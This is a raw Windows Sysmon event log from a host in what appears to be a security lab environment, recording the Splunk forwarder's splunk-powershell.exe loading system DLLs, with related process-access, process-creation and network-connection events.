WindowsValid 734700x800000000000000098801Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:49.702{326FD73D-C0B5-6294-330B-000000005502}5696C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8,IMPHASH=A24D446CB7FCBB6D29B592603C0BE00CtrueMicrosoft WindowsValid 734700x800000000000000098800Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:49.702{326FD73D-C0B5-6294-330B-000000005502}5696C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\adsldpc.dll10.0.14393.0 (rs1_release.160715-1616)ADs LDAP Provider C DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationadsldpcMD5=F03FD7F523CFDBB96B0F3B8012FC161D,SHA256=8218E5AC2D7A52A2D50CD8D3CC8AA8CE4E37D1BDECFA62BC2637AA32A01CBA54,IMPHASH=AFF2E9AF6DD20912DC1E604BDBCA3761trueMicrosoft WindowsValid 734700x800000000000000098799Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:49.702{326FD73D-C0B5-6294-330B-000000005502}5696C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3,IMPHASH=070F257E4632BC576557C4085595EAA4trueMicrosoft WindowsValid 734700x800000000000000098798Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:49.702{326FD73D-C0B5-6294-330B-000000005502}5696C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\vcruntime140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationvcruntime140.dllMD5=0C583614EB8FFB4C8C2D9E9880220F1D,SHA256=6CADB4FEF773C23B511ACC8B715A084815C6E41DD8C694BC70090A97B3B03FB9,IMPHASH=2CB5DA5225E972A08F32D04B8085DC7EtrueMicrosoft CorporationValid 734700x800000000000000098797Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:49.702{326FD73D-C0B5-6294-330B-000000005502}5696C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\ws2_32.dll10.0.14393.3241 (rs1_release_inmarket.190910-1801)Windows Socket 2.0 32-Bit DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationws2_32.dllMD5=06E82905620845A7C185BDEE85CC4140,SHA256=B75C9B080293F85568912BABE749F403144959206F9C6BAB36B628E8F77C5DA0,IMPHASH=76A5AA3DF6083D853F576403C8F841A8trueMicrosoft WindowsValid 734700x800000000000000098796Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:49.702{326FD73D-C0B5-6294-330B-000000005502}5696C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\archive.dll-----MD5=AD564ED89D67D88709AA5980BAE20604,SHA256=0EEBE5AA750667908006742E133AE1C273D966897B95B1A0E63826450BB4780A,IMPHASH=A48DFE6DD98128BE3EB687CBF2724A44trueSplunk, Inc.Valid 734700x800000000000000098795Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:49.702{326FD73D-C0B5-6294-330B-000000005502}5696C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\rpcrt4.dll10.0.14393.5125 (rs1_release.220429-1732)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=E22D365A75901B1AED4B2A329FC3B5EC,SHA256=70073F203292301E5B6854DED0F9150B97F2E81A2E12FF40C81E978382B8D2CB,IMPHASH=154EA5DE40F0F2475E943DE8013E5692trueMicrosoft WindowsValid 734700x800000000000000098794Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:49.702{326FD73D-C0B5-6294-330B-000000005502}5696C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\libeay32.dll1.0.2zaOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/libeay32.dllMD5=B28B29D2F85EB8349BFB5E7214D7F4D5,SHA256=17260ACBE55D8988E598ECEFBC60140EBE057336B47D8089444588321F067280,IMPHASH=838F909F0A52D977E0B8662364FA0BFEtrueSplunk, Inc.Valid 734700x800000000000000098793Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:49.702{326FD73D-C0B5-6294-330B-000000005502}5696C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec-openssl.dll-----MD5=98C643DECFE1971BE3E8B076B19BFD72,SHA256=A520C20F316C902985449BC17AB5F86FCF2F41420B08C1AE08BA06E767EB49F3,IMPHASH=464BF3FDF330E6A15D24CC679EF7F72EtrueSplunk, Inc.Valid 734700x800000000000000098792Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:49.702{326FD73D-C0B5-6294-330B-000000005502}5696C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec.dll-----MD5=9BC99DECE580BD163AC318FCD1ACB667,SHA256=94BA08021E14476ED8EC2DC81165574B64274E20F2D8DE9CA98CD0D10CE279F7,IMPHASH=3295DC2518E43BEF226F8847873D20C2trueSplunk, Inc.Valid 734700x800000000000000098791Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:49.702{326FD73D-C0B5-6294-330B-000000005502}5696C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\sechost.dll10.0.14393.5006 (rs1_release.220301-1704)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=9F0F4C38A22FC9FFB8814F77A9563680,SHA256=E9ABDA1063716301F5D06DBC94D6A35B3F53A14B946525E5F764485132DB6166,IMPHASH=D6E06125849E8565A50F366A0149FB40trueMicrosoft WindowsValid 734700x800000000000000098790Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:49.702{326FD73D-C0B5-6294-330B-000000005502}5696C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\ssleay32.dll1.0.2zaOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/ssleay32.dllMD5=0FE6D3D4B3F4B0F5502371832D12BB8E,SHA256=3DF79909021C72E70D2AE273587296E5E2D5F77315011B5C3115CFA359682647,IMPHASH=E09B42A7EA1725DA2CD99223AD969C63trueSplunk, Inc.Valid 734700x800000000000000098789Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:49.702{326FD73D-C0B5-6294-330B-000000005502}5696C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3,IMPHASH=57ABD1FDE351971A01E912069E11B44CtrueMicrosoft WindowsValid 734700x800000000000000098788Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:49.702{326FD73D-C0B5-6294-330B-000000005502}5696C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4,IMPHASH=07D6F84E3C8FD0D2C32F9398A0369BAFtrueMicrosoft WindowsValid 734700x800000000000000098787Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:49.702{326FD73D-C0B5-6294-330B-000000005502}5696C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\libxslt.dll-----MD5=FBA0D04D5A8AEA25D86EC623A14D0056,SHA256=D64FE508393C40160D1EFB22149C69763CBAA921BD1BC74C8D4AE59A10C3B767,IMPHASH=987AB6B8B03EE421D8CC59EAFE452916trueSplunk, Inc.Valid 734700x800000000000000098786Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:49.702{326FD73D-C0B5-6294-330B-000000005502}5696C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\activeds.dll10.0.14393.4169 (rs1_release.210107-1130)ADs Router Layer DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationADsMD5=C62947CD1080E3B128B517AE91B22D6D,SHA256=6BB5D8967F822B5B1646DC9069212914D36C4D3D65E086AC0890B6A02112B438,IMPHASH=C7DF3F2CF025F0BEDA797705E4F4AFBBtrueMicrosoft WindowsValid 734700x800000000000000098785Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:49.702{326FD73D-C0B5-6294-330B-000000005502}5696C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\libxml2.dll2.9.10libxml2 librarylibxml2-libxml2.dllMD5=20596DB2126E9F188727597F0FCC7CDB,SHA256=BAD6246A2B43B07FE80643DE40B0CE49751C8E0B95B076AD94E59F16CE8D8C0C,IMPHASH=6DA659461618DB73B9BD17D114677D20trueSplunk, Inc.Valid 734700x800000000000000098784Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:49.702{326FD73D-C0B5-6294-330B-000000005502}5696C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\advapi32.dll10.0.14393.4886 (rs1_release.220104-1735)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=C42106182CCA611F629E46981D1A0EEA,SHA256=68C134F95A8D38AE84545C8D581F4BF808B6C9D97513EA3CABF019C66419CBAE,IMPHASH=B511E4B82A44D3731CDA46A74F5D57EAtrueMicrosoft WindowsValid 10341000x800000000000000098783Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:49.702{326FD73D-A44C-6294-0901-000000005502}53725392C:\Windows\system32\conhost.exe{326FD73D-C0B5-6294-330B-000000005502}5696C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 734700x800000000000000098782Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:49.702{326FD73D-C0B5-6294-330B-000000005502}5696C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\KernelBase.dll10.0.14393.5125 (rs1_release.220429-1732)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=D8F18C830B03B0D60C10093ECB020E60,SHA256=CF0D33CEC46BB41C6F5693A84491ACD7F7CBECB429BA6C47AB5A170D4DF3484F,IMPHASH=05349EBAA635D77714868763D44881E9trueMicrosoft WindowsValid 734700x800000000000000098781Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:49.702{326FD73D-C0B5-6294-330B-000000005502}5696C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\kernel32.dll10.0.14393.5066 (rs1_release.220401-1841)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=E258A076D1B87D41F724E431B3293BA5,SHA256=0670462AC0932F314B2E4A0A20B4B6F96C024C2310BD2AF21B20BF7A8EC9FF8E,IMPHASH=3CE0779E0F4E275CD51A359A98CCC682trueMicrosoft WindowsValid 734700x800000000000000098780Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:49.702{326FD73D-C0B5-6294-330B-000000005502}5696C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\ntdll.dll10.0.14393.5006 (rs1_release.220301-1704)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F5EE39B17A8BCDEDC3D40997C26F62B1,SHA256=11C1C88B1CC11D9800DEEF27ED7ABDFDE3DC852687A3B9FBD5153284106E5952,IMPHASH=00000000000000000000000000000000trueMicrosoft WindowsValid 734700x800000000000000098779Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:49.702{326FD73D-C0B5-6294-330B-000000005502}5696C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----MD5=82B4C70E6AA15CE4AABB631DA73429A2,SHA256=80ECB7DFA33366FD12D6796A32E0435355F620DA83A8894D00BBAB09197A0F10,IMPHASH=1BDECF92268D3D3EF70015DDFEB0FFB9trueSplunk, Inc.Valid 10341000x800000000000000098778Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:49.702{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000098777Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:49.702{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000098776Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:49.702{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000098775Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:49.702{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000098774Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:49.702{326FD73D-A252-6294-0500-000000005502}416532C:\Windows\system32\csrss.exe{326FD73D-C0B5-6294-330B-000000005502}5696C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000098773Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:49.702{326FD73D-A44C-6294-0501-000000005502}51646008C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{326FD73D-C0B5-6294-330B-000000005502}5696C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000098772Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:49.704{326FD73D-C0B5-6294-330B-000000005502}5696C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{326FD73D-A253-6294-E703-000000000000}0x3e70SystemMD5=82B4C70E6AA15CE4AABB631DA73429A2,SHA256=80ECB7DFA33366FD12D6796A32E0435355F620DA83A8894D00BBAB09197A0F10,IMPHASH=1BDECF92268D3D3EF70015DDFEB0FFB9{326FD73D-A44C-6294-0501-000000005502}5164C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x800000000000000098771Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:45.974{326FD73D-A455-6294-3701-000000005502}6180C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-994.attackrange.local53319-false10.0.1.12-8000- 734700x800000000000000098770Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:49.218{326FD73D-C0B5-6294-320B-000000005502}4220C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=0AF5EF8A7FEFD4B37036B71514FC20CF,SHA256=D4F178583F6F33794D42B4DB11008494E9CD9F069C2AD2CA304DA63F9B5F659C,IMPHASH=94524C03C5380F78283785F1E05E667DtrueMicrosoft WindowsValid 10341000x800000000000000098769Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:49.218{326FD73D-C0B5-6294-320B-000000005502}42201912C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{326FD73D-A44C-6294-0501-000000005502}5164C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+606005|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+605b36|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+75996|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+9dd220|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 734700x800000000000000098768Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:49.218{326FD73D-C0B5-6294-320B-000000005502}4220C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\dbgcore.dll10.0.14321.1024 (debuggers(dbg).210127-1811)Windows Core Debugging HelpersMicrosoft® Windows® Operating SystemMicrosoftDBGCORE.DLLMD5=72E8FEC8419AB470FB737883463688FE,SHA256=1DA7D2D2D1C4E6EC17101A4997C4AA610818730D63C72C1D2084ABA3F25C5146,IMPHASH=F67CBD9561C1FEF51B817BA184E81D2EtrueMicrosoft WindowsValid 734700x800000000000000098767Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:49.218{326FD73D-C0B5-6294-320B-000000005502}4220C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\dbghelp.dll10.0.14321.1024 (rs1_release.160715-1616)Windows Image HelperMicrosoft® Windows® Operating SystemMicrosoftDBGHELP.DLLMD5=2C92DF5D32661FB4B81B08B72B2102A7,SHA256=BCEF4DEBDE7D8D6916EE3D3E5E63A725E03A058AABCD7DD49DF9D48B16E96D1A,IMPHASH=E7FD2920222985E31019D022BB39EFBEtrueMicrosoft WindowsValid 734700x800000000000000098766Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:49.046{326FD73D-C0B5-6294-320B-000000005502}4220C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=51FCB0FDEFCB9A3E4A1DC8C8673BC63C,SHA256=63A0E1A76B7ABCF56E44B548568649FFB6B5609402746D48A4DC77CCED20F5FE,IMPHASH=9E9C9DFD04CDDF2B6F1412BF096AEAF4trueMicrosoft WindowsValid 734700x800000000000000098765Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:49.046{326FD73D-C0B5-6294-320B-000000005502}4220C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\rsaenh.dll10.0.14393.4467 (rs1_release.210604-1844)Microsoft Enhanced Cryptographic ProviderMicrosoft® Windows® Operating SystemMicrosoft Corporationrsaenh.dllMD5=28140830C342F475A597B2D54C42DFFA,SHA256=99E23D0177C6DC59AD72DEEC46CFB995828EF567F001261BC65532B6DDEAD862,IMPHASH=C918D75BDB7774C087BB6C0C9C0A7686trueMicrosoft WindowsValid 734700x800000000000000098764Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:49.046{326FD73D-C0B5-6294-320B-000000005502}4220C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\cryptsp.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptographic Service Provider APIMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptsp.dllMD5=9500AE4C4B639FEAEED0CC6C39F45149,SHA256=C1055D4B9A854282336A5404CA0FCB1A2EBC3417600035338C9CDFC7B8D0778C,IMPHASH=96CBD1B5C0EA88B677BA3BB5FD009869trueMicrosoft WindowsValid 734700x800000000000000098763Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:49.046{326FD73D-C0B5-6294-320B-000000005502}4220C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\srvcli.dll10.0.14393.5066 (rs1_release.220401-1841)Server Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationSRVCLI.DLLMD5=75E3DE473374E0BCBBD1EC60036A93EC,SHA256=23EBE577D2080D4C7532184B69E44BF640BB44084F9046A5AF364268A7BDB1EC,IMPHASH=6CC8301D560C9DC6CB13A6320F3A3B1FtrueMicrosoft WindowsValid 734700x800000000000000098762Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:49.046{326FD73D-C0B5-6294-320B-000000005502}4220C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\bcrypt.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcrypt.dllMD5=63231EA984BC614584102A96D4F35CB4,SHA256=13C5BD283C01B0D50D8D0D99E88FC67F9234FA14A6860AB2B6EE552199FF6A74,IMPHASH=7C2E79D83754439DC7DE7882DCB4238DtrueMicrosoft WindowsValid 734700x800000000000000098761Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:49.046{326FD73D-C0B5-6294-320B-000000005502}4220C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\wkscli.dll10.0.14393.5066 (rs1_release.220401-1841)Workstation Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft 